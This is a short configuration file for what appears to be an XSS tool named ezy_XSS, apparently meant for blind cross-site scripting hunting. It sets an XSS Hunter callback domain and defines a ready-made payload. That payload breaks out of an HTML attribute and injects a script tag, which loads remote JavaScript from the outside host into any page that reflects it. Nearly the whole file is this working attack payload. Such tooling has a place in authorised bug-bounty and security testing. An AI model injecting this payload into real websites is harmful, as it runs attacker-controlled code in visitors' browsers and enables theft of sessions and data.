#################################################################
#			ezy_XSS config file						             	#
#################################################################

# General Values


#Paste your xsshunter domain here
xsshunter_domain="elprof3ss0r.xss.ht" 



#Use any xss Payload here
xss_payload='"><script src=https://elprof3ss0r.xss.ht></script>' 
